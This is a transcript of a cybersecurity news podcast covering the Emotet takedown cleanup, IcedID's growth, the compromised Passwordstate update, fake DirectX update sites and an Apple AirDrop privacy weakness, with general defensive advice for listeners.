Emotet wiped from servers, Passwordstate password manager compromised and be careful with Apple AirDrop file sharing
Welcome to Cyber Security Today. It’s Monday April 26th. I’m Howard Solomon, contributing reporter on cybersecurity for ITWorldCanada.com.
Some good news for information security professionals: Yesterday remnants of the Emotet backdoor were automatically removed from infected computers and servers. This means that Emotet can no longer be used to attack computers. This was promised in January after law enforcement agencies around the world took over the infrastructure behind the Emotet botnet. It was used by crooks to spread malware and ransomware to an estimated 1.7 million computers over several years through infected email attachments. Taking over the infrastructure stopped malware from using the Emotet infrastructure for communications. The three-month delay allowed IT staff to hunt for and delete Emotet-delivered malware in their systems.
Unfortunately another group has moved to fill the vacuum of Emotet’s disappearance. Recorded Future says a gang called IcedID is gaining popularity as a malware-as-a-service distributor used by other gangs to distribute infections. Older groups like Dridex, Trickbot and Quakbot are also seeing increased use of their infrastructure. But researchers report that use of IcedID has accelerated. Check Point Software says that IcedID was the second most prevalent malware in March, behind Dridex. Like Dridex and others, IcedID looks first for login passwords to steal. (CORRECTION: The podcast wrongly attributed the March report to Kaspersky)
Listeners already know about the attack on SolarWinds’ Orion network management platform. Attackers compromised the Orion security update mechanism and used it to distribute malware. Other hacking groups are copying the idea. A Dutch cybersecurity company reports that the makers of a corporate password manager called Passwordstate are notifying customers that updates downloaded between April 20 and the 22nd were compromised. It installed code that allows the downloading of malware. Click Studios, which makes Passwordstate has 29,000 business and government customers around the world. If your organization uses it, all passwords, including those for equipment like VPNs and firewalls, need to be reset.
I regularly remind listeners to make sure they’re running the latest versions of their software to protect against cyber attacks. But you also have to make sure you’re downloading updates from a safe website. Crooks are known to create websites distributing fake security updates. One of the latest is for the Microsoft DirectX utility for running multimedia applications. A game or video may say it needs the latest version of DirectX, so users go hunting the internet. Crooks count on that, so they create sites hoping people will click on their malicious updates. DirectX is made by Microsoft, so that’s the only place you should get it. The same goes for any update – get it only from the software maker’s site.
Finally, researchers warn owners of Apple devices to be careful using the AirDrop feature. It transfers files using WiFi and Bluetooth between people who are on each other’s contact list. The problem is in the wireless signal used by one device to check the contact list on Apple another device. In doing so it doesn’t completely protect phone numbers and email addresses. If a hacker is nearby they could intercept and unscramble the broadcasting of contact information. One solution is enabling AirDrop only when needed. Another is to avoid sending files this way in public places like hotels, restaurants, airports and convention centres where hackers may be lurking.
Follow Cyber Security Today on Apple Podcasts, Google Podcasts or add us to your Flash Briefing on your smart speaker.